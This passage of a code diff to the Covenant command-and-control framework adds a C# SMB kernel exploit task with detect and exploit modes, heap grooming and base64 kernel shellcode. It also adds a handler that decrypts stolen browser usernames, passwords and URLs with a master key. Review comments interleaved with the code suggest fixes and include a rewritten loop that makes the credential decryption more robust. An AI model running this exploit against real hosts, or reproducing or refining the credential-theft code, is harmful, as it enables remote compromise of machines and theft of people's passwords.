4096)); + pkt = pkt.Concat(SMBData.ToArray()).ToArray(); //Collect it all + } + + return pkt; + } + + static public byte[] MakeSMB1EchoPacket(ushort TID, ushort UID) + { + NETBIOS_HEADER NTHeader = new NETBIOS_HEADER + { + MessageTypeAndSize = 0x31000000 + }; + + SMB_HEADER header = new 
SMB_HEADER + { + protocol = 0x424d53ff, + command = 0x2b, + errorClass = 0x00, + _reserved = 0x00, + errorCode = 0x0000, + flags = 0x98, + flags2 = 0xc007, + PIDHigh = 0x0000, + SecurityFeatures = 0x0000000000000000, + reserved = 0x0000, + TID = TID, + PIDLow = 0xfeff, + UID = UID, + MID = 0x0040 + }; + byte[] headerBytes = GetBytes(NTHeader).Concat(GetBytes(header)).ToArray(); + + SMB_COM_ECHO_REQUEST echoRequest = new SMB_COM_ECHO_REQUEST + { + WordCount = 0x1, + EchoSequenceNumber = 0x0001, + }; + + //Add SMBData + List SMBData = new List(); + SMBData.AddRange(Enumerable.Repeat((byte)0x41, 11)); + SMBData.Add(0x00); + echoRequest.ByteCount = (ushort)(SMBData.Count); + //Merge SMBHeader with the echoRequest + byte[] echoRequestBytes = GetBytes(echoRequest).Concat(SMBData.ToArray()).ToArray(); + byte[] pkt = headerBytes.Concat(echoRequestBytes).ToArray(); + return pkt; + } + + static public byte[] SMB1LargeBuffer(SMB_HEADER header, Socket sock) + { + //Send and Recveive NT Trans packet + byte[] nt_trans_pkt = MakeSMB1NTTransPacket(header.TID, header.UID); + SendSMBMessage(sock, nt_trans_pkt, true); + ReceiveSMBMessage(sock); + + //initial trans2 request + byte[] trans_pkt_nulled = MakeSMB1Trans2ExploitPacket(header.TID, header.UID, "eb_trans2_zero", 0); + + //Send all but the last packet + for (int i = 1; i <= 14; i++) + { + byte[] temp = MakeSMB1Trans2ExploitPacket(header.TID, header.UID, "eb_trans2_buffer", i); + trans_pkt_nulled = trans_pkt_nulled.Concat(temp).ToArray(); + } + //Create SMB1 Echo packet + byte[] echo = MakeSMB1EchoPacket(header.TID, header.UID); + trans_pkt_nulled = trans_pkt_nulled.Concat(echo).ToArray(); + SendSMBMessage(sock, trans_pkt_nulled, false); + + return ReceiveSMBMessage(sock); + } + + static public byte[] MakeSMB1FreeHoleSessionPacket(byte[] flags2, byte[] vcnum, byte[] native_os) + { + byte[] pkt = { 0xff, 0x53, 0x4D, 0x42, 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, flags2[0], flags2[1], 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe, 0x00, 0x00, 0x40, 0x00, 0x0c, 0xff, 0x00, 0x00, 0x00, 0x04, 0x11, 0x0a, 0x00, vcnum[0], vcnum[1], 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x16, 0x00, native_os[0], native_os[1], native_os[2], native_os[3], native_os[4] }; + byte[] rest = Enumerable.Repeat((byte)0x00, 17).ToArray(); + pkt = pkt.Concat(rest).ToArray(); + return pkt; + } + + static public Socket SMB1FreeHole(string ip, int port, bool start) + { + TcpClient client = new TcpClient(ip, port); + Socket sock = client.Client; + ClientNegotiate(sock); + byte[] pkt; + if (start) + { + byte[] flags2 = { 0x07, 0xc0 }; + byte[] vcnum = { 0x2d, 0x01 }; + byte[] native_os = { 0xf0, 0xff, 0x00, 0x00, 0x00 }; + pkt = MakeSMB1FreeHoleSessionPacket(flags2, vcnum, native_os); + } + else + { + byte[] flags2 = { 0x07, 0x40 }; + byte[] vcnum = { 0x2c, 0x01 }; + byte[] native_os = { 0xf8, 0x87, 0x00, 0x00, 0x00 }; + pkt = MakeSMB1FreeHoleSessionPacket(flags2, vcnum, native_os); + } + + SendSMBMessage(sock, pkt, true); + ReceiveSMBMessage(sock); + return sock; + } + + static public List SMB2Grooms(string ip, int port, int grooms, byte[] payload_hdr_pkt, List groom_socks) + { + for (int i = 0; i < grooms; i++) + { + TcpClient client = new TcpClient(ip, port); + Socket gsock = client.Client; + groom_socks.Add(gsock); + SendSMBMessage(gsock, payload_hdr_pkt, false); + } + return groom_socks; + } + + static public byte[] MakeSMB2PayLoadHeadersPacket() + { + byte[] pkt = { 0x00, 0x00, 0xff, 0xf7, 0xfe, 0x53, 0x4D, 0x42 }; + byte[] tmp = Enumerable.Repeat((byte)0x00, 124).ToArray(); + pkt = pkt.Concat(tmp).ToArray(); + return pkt; + } + + static public byte[] MakeSMB2PayloadBodyPacket(byte[] kernel_user_payload) + { + int pkt_max_len = 4204; + int pkt_setup_len = 497; + int pkt_max_payload = pkt_max_len - pkt_setup_len; + List pkt = new List(); + + pkt.AddRange(new List() + { + 0x00, 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00, 0x03, 
0x00, 0x00, 0x00 + }); + pkt.AddRange(Enumerable.Repeat((byte)0x00, 28)); + pkt.AddRange(new List() + { + 0x03,0x00,0x00,0x00 + }); + pkt.AddRange(Enumerable.Repeat((byte)0x00, 116)); + //KI_USER_SHARED_DATA addresses + pkt.AddRange(new List() + { //64 + 0xb0,0x00,0xd0,0xff,0xff,0xff,0xff,0xff,0xb0,0x00,0xd0,0xff,0xff,0xff,0xff,0xff + }); + pkt.AddRange(Enumerable.Repeat((byte)0x00, 16)); + pkt.AddRange(new List() + { //86 + 0xc0,0xf0,0xdf,0xff,0xc0,0xf0,0xdf,0xff + }); + pkt.AddRange(Enumerable.Repeat((byte)0x00, 196)); + + //payload address + pkt.AddRange(new List() + { + 0x90,0xf1,0xdf,0xff + }); + pkt.AddRange(Enumerable.Repeat((byte)0x00, 4)); + pkt.AddRange(new List() + { + 0xf0,0xf1,0xdf,0xff + }); + pkt.AddRange(Enumerable.Repeat((byte)0x00, 64)); + pkt.AddRange(new List() + { + 0xf0,0x01,0xd0,0xff,0xff,0xff,0xff,0xff + }); + pkt.AddRange(Enumerable.Repeat((byte)0x00, 8)); + pkt.AddRange(new List() + { + 0x00,0x02,0xd0,0xff,0xff,0xff,0xff,0xff,0x00 + }); + pkt = pkt.Concat(kernel_user_payload).ToList(); + + int j = pkt_max_payload - kernel_user_payload.Length; + pkt.Add(0x00); + /* + for (int i = 0; i < j; i++) + { + pkt.Add(0x00); + } + */ + return pkt.ToArray(); + } + + static public byte[] customKernel() + { + + string shellcodeb64_x86 = "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"; + + string shellcodeb64_x64 = "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"; + byte[] shellcode = Convert.FromBase64String(shellcodeb64_x64); + return shellcode; + } + + static public byte[] MakeKernelUserPayload(byte[] ring3) + { + + byte[] shellcode = customKernel(); + byte[] length = BitConverter.GetBytes((UInt16)ring3.Length); + shellcode = shellcode.Concat(length).ToArray(); + shellcode = shellcode.Concat(ring3).ToArray(); + return shellcode; + } + + + + + + static bool Detect(string target) + { + string ip = target; + int port = 445; + + try + { + TcpClient client = new TcpClient(ip, port); + Socket sock = client.Client; + + ClientNegotiate(sock); + 
byte[] response = SMB1AnonymousLogin(sock); + output += Environment.NewLine +"Trying to detect version of Windows running on " + target + " ..."; + DetectVersionOfWindows(response); + + SMB_HEADER header = SMB_HeaderFromBytes(response); + TreeConnectAndXRequest(ip, sock, header.UID); + + //This is checked with userid 2049 and not 2048 + bool vulnerable = CheckVulnerability(sock); + if (vulnerable) + { + output += Environment.NewLine +target + " appears to be vulnerable!"; + sock.Close(); + client.Close(); + return true; + } + else + { + output += Environment.NewLine +"IP: " + target + " does not appears to be vulnerable!"; + sock.Close(); + client.Close(); + } + } + catch + { + return false; + } + return false; + } + + static void Exploit(string target,byte[] buffer) + { + string ip = target; + int port = 445; + int grooms = 12; + + TcpClient client = new TcpClient(ip, port); + Socket sock = client.Client; + + output += Environment.NewLine + "buffer length: " + buffer.Length; + + byte[] shellcode = MakeKernelUserPayload(buffer); + byte[] payload_hdr_pkt = MakeSMB2PayLoadHeadersPacket(); + byte[] payload_body_pkt = MakeSMB2PayloadBodyPacket(shellcode); + + output += Environment.NewLine +"Trying to exploit: " + target; + ClientNegotiate(sock); + byte[] response = SMB1AnonymousLogin(sock); + SMB_HEADER header = SMB_HeaderFromBytes(response); + response = TreeConnectAndXRequest(ip, sock, header.UID); + header = SMB_HeaderFromBytes(response); + sock.ReceiveTimeout = 2000; + output += Environment.NewLine +"Connection established for exploitation."; + + output += Environment.NewLine +"Creating a large SMB1 buffer... 
All but last fragment of exploit packet"; + SMB1LargeBuffer(header, sock); + Socket fhs_sock = SMB1FreeHole(ip, port, true); + + output += Environment.NewLine +"Grooming..."; + List grooms_socks = new List(); + grooms_socks = SMB2Grooms(ip, port, grooms, payload_hdr_pkt, grooms_socks); + Socket fhf_sock = SMB1FreeHole(ip, port, false); + fhs_sock.Close(); + grooms_socks = SMB2Grooms(ip, port, 6, payload_hdr_pkt, grooms_socks); + fhf_sock.Close(); + + output += Environment.NewLine +"Ready for final exploit..."; + byte[] final_exploit_pkt = MakeSMB1Trans2ExploitPacket(header.TID, header.UID, "eb_trans2_exploit", 15); + + try + { + SendSMBMessage(sock, final_exploit_pkt, false); + response = ReceiveSMBMessage(sock); + header = new SMB_HEADER(); + header = SMB_HeaderFromBytes(response); + } + catch (Exception e) + { + output += Environment.NewLine +"Socket error, this might end badly" + e.Message; + } + + output += Environment.NewLine +"Sending exploits with the grooms"; + foreach (Socket s in grooms_socks) + { + SendSMBMessage(s, payload_body_pkt.Take(2920).ToArray(), false); + } + foreach (Socket s in grooms_socks) + { + SendSMBMessage(s, payload_body_pkt.Skip(2920).ToArray(), false); + } + foreach (Socket s in grooms_socks) + { + s.Close(); + } + output += Environment.NewLine +"Exploit send successfully..."; + client.Close(); + sock.Close(); + } + + public static string Execute(string Command,string payload) + { + try + { + string[] args = Command.Split(' '); + if (args[0] == "detect") + { + Detect(args[1]); + return output; + } + else + { + try + { + Exploit(args[1], Convert.FromBase64String(payload)); + } + catch(Exception e) + { + return e.Message; + } + + } + return output; + } + catch(Exception x) + { + return x.Message; + } + } + } + + TaskingType: Assembly + UnsafeCompile: false + TokenTask: false + Options: + - Name: Command + Value: '' + DefaultValue: '' + Description: command , exploit or detect and ip address + SuggestedValues: ['exploit 
192.168.1.69','detect 192.168.4.20'] + Optional: true + DisplayInCommand: true + FileOption: false + - Name: payload + Value: '' + DefaultValue: '' + Description: shellcode + SuggestedValues: [] + Optional: true + DisplayInCommand: false + FileOption: true + ReferenceAssemblies: + - Name: mscorlib.dll + Location: net35\mscorlib.dll + DotNetVersion: Net35 + - Name: System.Configuration.Install.dll + Location: net35\System.Configuration.Install.dll + DotNetVersion: Net35 + - Name: System.Core.dll + Location: net35\System.Core.dll + DotNetVersion: Net35 + - Name: System.Data.DataSetExtensions.dll + Location: net35\System.Data.DataSetExtensions.dll + DotNetVersion: Net35 + - Name: System.Data.dll + Location: net35\System.Data.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.AccountManagement.dll + Location: net35\System.DirectoryServices.AccountManagement.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.dll + Location: net35\System.DirectoryServices.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.Protocols.dll + Location: net35\System.DirectoryServices.Protocols.dll + DotNetVersion: Net35 + - Name: System.dll + Location: net35\System.dll + DotNetVersion: Net35 + - Name: System.Drawing.dll + Location: net35\System.Drawing.dll + DotNetVersion: Net35 + - Name: System.IdentityModel.dll + Location: net35\System.IdentityModel.dll + DotNetVersion: Net35 + - Name: System.Management.Automation.dll + Location: net35\System.Management.Automation.dll + DotNetVersion: Net35 + - Name: System.Management.dll + Location: net35\System.Management.dll + DotNetVersion: Net35 + - Name: System.Security.dll + Location: net35\System.Security.dll + DotNetVersion: Net35 + - Name: System.ServiceProcess.dll + Location: net35\System.ServiceProcess.dll + DotNetVersion: Net35 + - Name: System.Web.Extensions.dll + Location: net35\System.Web.Extensions.dll + DotNetVersion: Net35 + - Name: System.Windows.Forms.dll + Location: net35\System.Windows.Forms.dll + 
DotNetVersion: Net35 + - Name: System.XML.dll + Location: net35\System.XML.dll + DotNetVersion: Net35 + - Name: mscorlib.dll + Location: net40\mscorlib.dll + DotNetVersion: Net40 + - Name: System.Configuration.Install.dll + Location: net40\System.Configuration.Install.dll + DotNetVersion: Net40 + - Name: System.Core.dll + Location: net40\System.Core.dll + DotNetVersion: Net40 + - Name: System.Data.DataSetExtensions.dll + Location: net40\System.Data.DataSetExtensions.dll + DotNetVersion: Net40 + - Name: System.Data.dll + Location: net40\System.Data.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.AccountManagement.dll + Location: net40\System.DirectoryServices.AccountManagement.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.dll + Location: net40\System.DirectoryServices.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.Protocols.dll + Location: net40\System.DirectoryServices.Protocols.dll + DotNetVersion: Net40 + - Name: System.dll + Location: net40\System.dll + DotNetVersion: Net40 + - Name: System.Drawing.dll + Location: net40\System.Drawing.dll + DotNetVersion: Net40 + - Name: System.IdentityModel.dll + Location: net40\System.IdentityModel.dll + DotNetVersion: Net40 + - Name: System.Management.Automation.dll + Location: net40\System.Management.Automation.dll + DotNetVersion: Net40 + - Name: System.Management.dll + Location: net40\System.Management.dll + DotNetVersion: Net40 + - Name: System.Security.dll + Location: net40\System.Security.dll + DotNetVersion: Net40 + - Name: System.ServiceProcess.dll + Location: net40\System.ServiceProcess.dll + DotNetVersion: Net40 + - Name: System.Web.Extensions.dll + Location: net40\System.Web.Extensions.dll + DotNetVersion: Net40 + - Name: System.Windows.Forms.dll + Location: net40\System.Windows.Forms.dll + DotNetVersion: Net40 + - Name: System.XML.dll + Location: net40\System.XML.dll + DotNetVersion: Net40 + EmbeddedResources: [] + 
diff --git a/Covenant/Models/Covenant/Event.cs b/Covenant/Models/Covenant/Event.cs index 98cd103d..66079c63 100644 --- a/Covenant/Models/Covenant/Event.cs +++ b/Covenant/Models/Covenant/Event.cs @@ -8,6 +8,14 @@ using System.ComponentModel.DataAnnotations.Schema; using Covenant.Core; +using System.Security.Cryptography; +using System.Collections.Generic; +using System.Text; +using Org.BouncyCastle.Crypto.Engines; +using Org.BouncyCastle.Crypto.Modes; +using Org.BouncyCastle.Crypto.Parameters; +using System.Linq; +using static Donut.Helper; namespace Covenant.Models.Covenant { @@ -24,7 +32,8 @@ public enum EventType { Normal, Download, - Screenshot + Screenshot, + Decrypt } public class Event : ILoggable 
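Review bot: `using System.Security.Cryptography;`, `using System.Collections.Generic;` and `using static Donut.Helper;` are added at the top of Event.cs, but as far as the hunks in this file show nothing in the new `DecryptEvent` code references them; the AES-GCM path goes entirely through the three `Org.BouncyCastle` namespaces, so the unused directives should be dropped so the file's dependency list reflects what it actually uses. If the project targets .NET Core 3.0 or later, `System.Security.Cryptography.AesGcm` could do the same decryption and avoid tying the models assembly to BouncyCastle, but the target framework is not visible in this diff.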
@@ -44,6 +53,96 @@ public class Event : ILoggable public string ToLog(LogAction action) => $"Event|{action}|{this.Id}|{this.Time}|{this.Level}|{this.Type}|{this.Context}|{this.MessageHeader}"; } + public class DecryptEvent : Event + { + + public string EncryptedOutput { get; set; } = ""; + public string DecryptedOutput { get; set; } = ""; + + public int GruntCommandId { get; set; } + public DecryptEvent() + { + this.Type = EventType.Decrypt; + } + + public bool Decrypt() + { + + try + { + + string[] lines = EncryptedOutput.Split(Environment.NewLine); + + + byte[] key = Convert.FromBase64String(lines[0]); + + + DecryptedOutput = "master key decrypted: " + lines[0] + Environment.NewLine; + + DecryptedOutput += "username : password : url" + Environment.NewLine; + DecryptedOutput += "______________________________________________________" + Environment.NewLine; + + + foreach (string line in lines) + { + try + { + string username = line.Split(':')[0]; + + if(line.Split(':')[1].StartsWith("ENC_")) + { + byte[] payload = Convert.FromBase64String(line.Split(':')[1].Substring(4)); + string password = Encoding.Default.GetString(AesGcmDecrypt(key, payload)); + + DecryptedOutput += username + " : " + password + " : " + line.Split(':')[2] + line.Split(':')[3]; + DecryptedOutput += Environment.NewLine; + } + else + { + + DecryptedOutput += username + " : " + line.Split(':')[1] + " : " + line.Split(':')[2] + line.Split(':')[3]; + DecryptedOutput += Environment.NewLine; + } + + } + catch (Exception) + { + + } + } + } + catch (Exception x) + { + + DecryptedOutput = x.Message + Environment.NewLine + EncryptedOutput; + } + return true; + } + + + public static byte[] AesGcmDecrypt( byte[] key, byte[] payload) + { + + byte[] nonce = payload.Skip(3).Take(12).ToArray(); + byte[] realPayload = payload.Skip(15).ToArray(); + + + return AesGcmDecrypt(realPayload, key, nonce); + } + + public static byte[] AesGcmDecrypt(byte[] payload, byte[] key, byte[] nonce) + { + var cipher = new 
GcmBlockCipher(new AesEngine()); + cipher.Init(false, new AeadParameters(new KeyParameter(key), 128, nonce)); + + var clearBytes = new byte[cipher.GetOutputSize(payload.Length)]; + int len = cipher.ProcessBytes(payload, 0, payload.Length, clearBytes, 0); + cipher.DoFinal(clearBytes, len); + return clearBytes; + } + + } + public class DownloadEvent : Event { public enum DownloadProgress @@ -115,5 +214,10 @@ public class DownloadEventContent : DownloadEvent public class ScreenshotEventContent : ScreenshotEvent { public byte[] FileContents { get; set; } + } + + public class DecryptEventContent : DecryptEvent + { + public string EncryptedOutput { get; set; } } } diff --git a/Covenant/Models/CovenantContext.cs b/Covenant/Models/CovenantContext.cs index d5d87e5b..fd562cf5 100644 --- a/Covenant/Models/CovenantContext.cs +++ b/Covenant/Models/CovenantContext.cs @@ -98,6 +98,8 @@ protected override void OnModelCreating(ModelBuilder builder) builder.Entity().HasBaseType(); builder.Entity().HasBaseType(); + builder.Entity().HasBaseType(); + builder.Entity(); builder.Entity()
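Review bot: A GCM tag-check failure from `cipher.DoFinal` (BouncyCastle throws `InvalidCipherTextException`) is swallowed by the empty `catch (Exception) { }` inside the `foreach` in `Decrypt()`, so a row decrypted with the wrong master key, or from a corrupted or tampered blob, simply vanishes from `DecryptedOutput` and the operator cannot tell "wrong key" apart from "no saved logins". The same loop reassembles the URL as `line.Split(':')[2] + line.Split(':')[3]`, which drops the colon after the scheme and silently truncates anything past a fourth `:` (a port, or a path containing one); `string.Join(":", fields.Skip(2))` keeps the value intact. Separately, `DecryptEventContent` redeclares `EncryptedOutput`, hiding the base property that `Decrypt()` reads, so an instance populated through the derived type would presumably decrypt an empty string; the base already declares it, so the redeclaration should go. The rewrite below reports failures per row and keeps the URL whole; it leaves the outer catch alone, which still copies the raw input (including the base64 master key) into `DecryptedOutput` and still returns `true`.
```csharp
// … unchanged: key parsing and the header lines written to DecryptedOutput …
foreach (string line in lines.Skip(1))   // lines[0] is the master key, not a credential row
{
    string[] fields = line.Split(':');
    if (fields.Length < 3)
    {
        continue;   // not a username:password:url row
    }
    try
    {
        string password = fields[1];
        if (password.StartsWith("ENC_", StringComparison.Ordinal))
        {
            byte[] payload = Convert.FromBase64String(password.Substring(4));
            password = Encoding.Default.GetString(AesGcmDecrypt(key, payload));
        }
        DecryptedOutput += fields[0] + " : " + password + " : " + string.Join(":", fields.Skip(2)) + Environment.NewLine;
    }
    catch (Org.BouncyCastle.Crypto.InvalidCipherTextException)
    {
        // GCM tag mismatch: wrong master key or a corrupted/tampered blob. Say so instead of dropping the row.
        DecryptedOutput += fields[0] + " : <decrypt failed: GCM tag mismatch> : " + string.Join(":", fields.Skip(2)) + Environment.NewLine;
    }
    catch (Exception e)
    {
        // Best-effort per row, but never silent: malformed base64, short payload, etc.
        DecryptedOutput += fields[0] + " : <decrypt failed: " + e.GetType().Name + "> : " + string.Join(":", fields.Skip(2)) + Environment.NewLine;
    }
}
// … unchanged: outer catch and return …
```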